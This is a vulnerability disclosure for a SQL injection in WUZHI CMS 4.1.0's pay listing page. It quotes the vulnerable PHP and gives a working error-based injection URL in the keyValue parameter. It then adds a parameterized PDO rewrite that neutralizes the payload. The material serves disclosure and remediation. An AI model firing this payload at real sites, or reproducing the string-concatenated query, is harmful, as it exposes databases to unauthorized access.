A SQL injection vulnerability was discovered in WUZHI CMS 4.1.0. It allows remote attackers to inject a malicious SQL statement into the server via index.php?m=pay&f=index&v=listing&keytype=0&_su=wuzhicms&_menuid=36&search=&fieldtype=0&keyValue={sql payload}&status=&starttime=&endtime=
filename
/coreframe/app/admin/pay/admin/index.php
poc
$fieldtypes = array('订单号','手机号','所属客服','经销商');
$keytype = isset($GLOBALS['keytype']) ? intval($GLOBALS['keytype']) : 0;
$payments = $this->payments;
$status_arr = $this->status_arr;
$page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
$page = max($page, 1);
$status = $GLOBALS['status'];
if ($status) {
    $where = 'status=' . $status;
} else {
    $where = 'status>0';
}
if ($keytype) {
    $where .= " AND `keytype`='$keytype'";
}
// strip_tags() only removes HTML/PHP tags; it does not escape quotes for SQL
$keyValue = strip_tags($GLOBALS['keyValue']);
$fieldtype = intval($GLOBALS['fieldtype']);
if ($keyValue) {
    // $keyValue is concatenated directly into the WHERE clause
    switch ($fieldtype) {
        case 0:
            $where .= " AND `order_no`='$keyValue'";
            break;
        case 1:
            $where .= " AND `telephone`='$keyValue'";
            break;
        case 2:
            $where .= " AND `kf_username`='$keyValue'";
            break;
        case 3:
            $where .= " AND `jxs_username`='$keyValue'";
            break;
    }
}
if ($_SESSION['role'] == 4) {
    // customer service
    $kf_username = get_cookie('username');
    $where .= " AND `kf_username`='$kf_username'";
}
$starttime = '';
$endtime = '';
poc
sql payload: index.php?m=pay&f=index&v=listing&keytype=0&_su=wuzhicms&_menuid=36&search=&fieldtype=0&keyValue='+and+updatexml(7,concat(0x7e,now(),0x7e),7)%23&status=&starttime=&endtime=
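
A hardened form of the keyValue filter from the snippet above, as an added example that is not WUZHI CMS code and not part of the original report. It uses PDO placeholders in place of string concatenation; the function name build_listing_filter and the table pay_demo are hypothetical, and the demo row is constructed.

```php
<?php
// Added example, not WUZHI CMS code. build_listing_filter() and the pay_demo
// table are hypothetical; column names are those in the snippet above.

// Returns [where clause with placeholders, values to bind].
function build_listing_filter(array $in): array
{
    // The column comes from a fixed allow-list keyed by fieldtype.
    $columns = [0 => 'order_no', 1 => 'telephone', 2 => 'kf_username', 3 => 'jxs_username'];
    $where  = [];
    $params = [];

    // status must be an integer; empty or non-numeric input falls back to status > 0.
    $status = filter_var($in['status'] ?? '', FILTER_VALIDATE_INT);
    if ($status !== false && $status !== 0) {
        $where[] = 'status = :status';
        $params[':status'] = $status;
    } else {
        $where[] = 'status > 0';
    }

    $fieldtype = (int) ($in['fieldtype'] ?? 0);
    $keyValue  = (string) ($in['keyValue'] ?? '');
    if ($keyValue !== '' && isset($columns[$fieldtype])) {
        $where[] = $columns[$fieldtype] . ' = :kv';
        $params[':kv'] = $keyValue; // bound as data, so a quote cannot end the literal
    }
    return [implode(' AND ', $where), $params];
}

// Constructed demo row in an in-memory SQLite database (needs the pdo_sqlite extension).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE pay_demo (order_no TEXT, telephone TEXT,
            kf_username TEXT, jxs_username TEXT, status INTEGER)');
$pdo->exec("INSERT INTO pay_demo VALUES ('A1001', '13800000000', 'kf1', 'jxs1', 1)");

// One ordinary order number and the keyValue from the report, URL-decoded.
$inputs = ['A1001', "' and updatexml(7,concat(0x7e,now(),0x7e),7)#"];
foreach ($inputs as $kv) {
    [$where, $params] = build_listing_filter(['fieldtype' => 0, 'keyValue' => $kv, 'status' => '']);
    $stmt = $pdo->prepare("SELECT order_no FROM pay_demo WHERE $where");
    $stmt->execute($params);
    printf("%-48s rows=%d\n", $kv, count($stmt->fetchAll()));
}
```

With the value bound as a parameter, the reported keyValue is compared as a plain string against order_no and matches no row, while the ordinary order number still returns its record.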